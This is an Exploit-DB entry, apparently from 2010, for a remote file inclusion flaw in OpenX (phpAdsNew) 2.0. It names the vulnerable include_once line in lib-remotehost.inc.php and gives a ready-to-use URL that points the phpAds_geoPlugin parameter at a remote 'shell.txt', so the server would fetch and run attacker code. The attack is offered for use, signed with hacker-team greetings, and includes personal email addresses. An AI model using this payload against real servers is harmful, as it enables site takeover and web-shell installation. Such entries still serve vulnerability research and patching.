OpenX phpAdsNew Remote File inclusion Vulnerability

2010-07-21T00:00:00
ID EDB-ID:14432
Type exploitdb
Reporter ViRuS Qalaa
Modified 2010-07-21T00:00:00

Description

OpenX (phpAdsNew) Remote File inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            # Exploit Title:    OpenX (phpAdsNew) Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: ViRuS Qalaa
# Email: em9@live.com
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script url:
http://www.opensourcescripts.com/dir/PHP/Ad_Management/phpadsnew_11.html
# download Script:
http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download
# Version:2.0
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
# HaCkEr aRaR: y.0@hotmail.de
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-
include_once ($phpAds_geoPlugin);
/libraries/lib-remotehost.inc.php
Line:109

----exploit----

http://
{localhost}/{path}/libraries/lib-remotehost.inc.php?phpAds_geoPlugin==shell.txt?

---------greatz----------
Greatz to :
hacker arar,ViRuS KSA,Q2,Spy-iq

and My friends Others and My friends in MSN
EnJoY o_O